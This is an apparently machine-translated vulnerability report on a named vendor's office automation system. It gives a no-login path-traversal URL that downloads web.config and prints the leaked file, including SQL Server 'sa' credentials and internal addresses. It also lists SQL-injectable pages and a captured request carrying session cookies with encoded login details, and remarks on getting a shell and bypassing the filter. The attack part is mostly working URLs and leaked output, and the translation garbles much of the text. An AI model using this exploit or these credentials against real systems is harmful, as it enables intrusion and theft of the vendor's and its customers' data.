SQL Injection Vulnerability + Arbitrary File Download Vulnerability in N cyberspace office systems
1. Official Instructions are as follows:
Http://www.isoffice.cn/Web/Index/WebDetail/customer
0x01 Arbitrary File Download Vulnerability (No Logon required)
Official Website demonstration
Oa.isoffice.cn/FrmDownFile.aspx? FileOraName=1.txt&FileType=.txt & strName =.../web. config
<? Xml version = "1.0" encoding = "UTF-8"?> <Configuration> <configSections> <sectionGroup name = "applicationSettings" type = "System. configuration. applicationSettingsGroup, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089 "> <section name =" SFOAV5. _ 0. properties. settings "type =" System. configuration. clientSettingsSection, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089 "requirePermission =" false "/> </SectionGroup> </configSections> <appSettings> <add key = "aspnet: maxHttpCollectionKeys "value =" 5000 "/> <add key =" strConn "value =" server = 192.168.0.1; database = SFOAV5; uid = sa; pwd = 123456 "/> <add key =" CASHost "value =" "/> <add key =" ServiceURL "value =" "/> <add key =" Filter "value = "xp _-XP _ $ sp _-SP _ $ [| \) | \] | \ '] + (or) [| \ (| \ [| \'] +-or $ [| \) | \] | \ '] + (and) [| \ (| \ [| \'] +-and $ exec [| \ [] +-exec $ Dbcc [| \ [] +-dbcc $ (alter [|]) | ([| \) | \] | \ '] alter [|]) +-alter $ (drop [|]) | ([| \) | \] | \ '] drop [|])-drop $ (insert [|]) | ([| \) | \] | \ '] insert [|])-insert $ (update [| \ [] +) | [| \) | \] | \ '] + (update [| \ [] +)-update $ (delete [| \ [] +) | ([| \) | \] | \ '] delete [| \ [] +) +-delete $ count-count $ master-master $ (truncate [|]) | ([| \) | \] | \ '] truncate [|]) +-truncate $ char [|] +-char $ char \ (-c Har ($ declare [|] +-declare $ [| \) | \] + where [| \ (| \ [] +-where $ set [| \ [] +-set $ mid [| (] +- mid $ chr [| (] +-chr $ net [|] +-net $ backup [|] +-backup "/> </appSettings> <connectionStrings> <add name = "strConn" connectionString = "server = 127.0.0.1; database = sfoav5; uid = sa; pwd = w @ soffice86960316l "/> <add name =" strConn2 "connectionString =" "/> <add name =" MailType "connectionString =" 1 "/> <add na Me = "MailServer" connectionString = "192.168.0.32"/> <add name = "MailDNS" connectionString = "202.101.224.68"/> <add name = "MenuTech" connectionString = "0"/> <! -- <Add name = "Control" connectionString = "0"/> --> <add name = "Store" connectionString = "0"/> <add name = "MenuUpload" connectionString = "1"/> <add name = "EpmSystem" connectionString = "1"/> <add name = "App" connectionString = "0"/> <! -- <Add name = "Lite" connectionString = "0"/> --> <add name = "SunUrl" connectionString = ""/> </connectionStrings> <system. web> <webServices> <protocols> <add name = "HttpPost"/> <add name = "HttpGet"/> </protocols> </webServices> <pages enableViewStateMac = "false "enableEventValidation =" false "validateRequest =" false "controlRenderingCompatibilityVersion =" 3.5 "clientIDMode =" AutoID "/> <! -- Dynamic debugging compilation setting compilation debug = "true" to enable ASPX debugging. Otherwise, setting this value to false improves the runtime performance of the application. Set compilation debug = "true" to insert the debug symbol (. pdb information) into the compilation page. Because this will create a large file that runs slowly, you should set this value to true only during debugging, and set it to false in all other cases. For more information, see the documentation for debugging ASP. NET files. --> <Compilation defaultLanguage = "c #" debug = "true" targetFramework = "4.0"/> <! -- Set custom error information to customErrors mode = "On" or "RemoteOnly" to enable custom error information or to "Off" to disable custom error information. Add the <error> flag for each error to be processed. "On" always displays custom (friendly) information. "Off" always displays detailed ASP. NET error messages. "RemoteOnly" only displays custom (friendly) information for users not running on the Local Web server. For security purposes, we recommend that you use this setting so that detailed information about the application is not displayed to the remote client. --> <CustomErrors mode = "Off" defaultRedirect = "SysError. aspx"/> <! -- Authentication This section sets the authentication policy for the application. Possible modes are "Windows", "Forms", "Passport", and "None" "None" without authentication. "Windows" IIS performs Identity Authentication Based on application settings (basic, simple, or integrated Windows ). Anonymous access must be disabled in IIS. "Forms" you provide a custom form (Web page) for users to enter creden。, and then verify their identity in your application. User creden are stored in cookies. "Passport" authentication is performed through Microsoft's centralized Identity Authentication Service. It provides independent logon and core configuration file services for member sites. --> <! -- <Identity impersonate = "true" userName = "iusr_pc2011042523oby" password = "123456"/> --> <authentication mode = "Windows"/> <! -- Authorize this section to set the application Authorization Policy. Different users or roles can be allowed or denied to access application resources. Wildcard: "*" indicates anyone ,"? "Indicates anonymous (unauthenticated) users. --> <Authorization> <allow users = "*"/> <! -- Allow all users --> <! -- <Allow users = "[comma-separated user list]" roles = "[comma-separated role list]"/> <deny users = "[comma-separated user list]" roles = "[list of roles separated by commas]"/> --> </authorization> <! -- Application-level tracing records application-level tracing enables tracing log output for each page of the application. Set trace enabled = "true" to enable application tracking records. If pageOutput = "true", the trace information is displayed at the bottom of each page. Otherwise, you can view the application trace log by browsing the "trace. axd" page in the Web application root directory. --> <Trace enabled = "false" requestLimit = "10" pageOutput = "false" traceMode = "SortByTime" localOnly = "true"/> <! -- Session Status settings by default, ASP. NET uses cookies to identify which requests belong to a specific session. If the Cookie is unavailable, you can trace the session by adding the session identifier to the URL. To disable Cookie, set sessionState cookieless = "true ". --> <SessionState mode = "InProc" stateConnectionString = "tcpip = 192.168.0.30: 42424" sqlConnectionString = "data source = 192.168.0.30; trusted_Connection = yes "cookieless =" false "timeout =" 20 "/>
The user name and password of the database can be obtained. It is really convenient to remove a database
<Add name = "strConn" connectionString = "server = 127.0.0.1; database = sfoav5; uid = sa; pwd = w @ soffice86960824l"/>
The above is the database username and password. If the port is open to external parties, directly use shell ....
We can see that the filter is performed.
<add key="Filter" value="xp_-XP_$$sp_-SP_$$[ | |\)|\]|\']+(or)[ | |\(|\[|\']+- or $$[ | |\)|\]|\']+(and)[ | |\(|\[|\']+- and $$exec[ | |\[]+-exec $$dbcc[ | |\[]+-dbcc $$(alter[ | ])|([ | |\)|\]|\']alter[ | ])+-alter $$(drop[ | ])|([ | |\)|\]|\']drop[ | ])-drop $$(insert[ | ])|([ | |\)|\]|\']insert[ | ])-insert $$(update[ | |\[]+)|[ | |\)|\]|\']+(update[ | |\[]+)-update $$(delete[ | |\[]+)|([ | |\)|\]|\']delete[ | |\[]+)+-delete $$count-count$$master-master$$(truncate[ | ])|([ | |\)|\]|\']truncate[ | ])+-truncate $$char[ | ]+-char $$char\(-char($$declare[ | ]+-declare $$[ | |\)|\]]+where[ | |\(|\[]+-where $$set[ | |\[]+-set $$mid[ | |(]+-mid $$chr[ | |(]+-chr $$net[ | ]+-net $$backup[ | ]+-backup " />
0x02 SQL injection (1)
GET/FrmMenuURL. aspx? ID = 430 HTTP/1.1
Host: oa.isoffice.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://oa.isoffice.cn/indexnew.aspxCookie: Hm_lvt_9f77501cb52bcbcaacbe546cf8ac3644=1411040329; UserName=dGVzdA%3D%3D%26; UserPwd=c29mZmljZQ%3D%3D%26; ASP.NET_SessionId=oclux2raem4tvc1ufab2v10a; SFOAUserCode=test; SFOAUserName=%b2%e2%ca%d4%d3%c3%bb%a7; SFOADeptName=%be%ad%c0%ed%b0%ec; SFOADeptID=1; SFOAWorker=%d7%dc%be%ad%c0%ed; SFOARoleID=81; SFOASysManager=; SFOAStyle=new; SFOAUserIkey=false; SFOAHeadColorR=198; SFOAHeadColorG=198; SFOAHeadColorB=198; SFOAMidColor=%23f0f0f0; SFOAMoveColor=%23e7e7e7; SFOAIPAddress=113.12.200.179; PageIndex=1; OrderInfo=; SFOA16Color=%23c6c6c6; Hm_lpvt_9f77501cb52bcbcaacbe546cf8ac3644=1411041098Connection: keep-alive
0x02 SQL Injection
Http://oa.isoffice.cn/AdverInfo/ShowAdverInfo.aspx? Id = 1767
Because the program itself filters and adds 360 protection. Data injection needs to be bypassed
Http://oa.isoffice.cn/WorkPlan/WaitingWork.aspx
Http://oa.isoffice.cn/ExamInfo/PrintPaper.aspx? ID = 17
Proof of vulnerability:
<Add name = "strConn" connectionString = "server = 127.0.0.1; database = sfoav5; uid = sa; pwd = w @ soffice86960824l"/>
The above is the database username and password. If the port is open to external parties, directly use shell ....
Solution:
Enhanced Filtering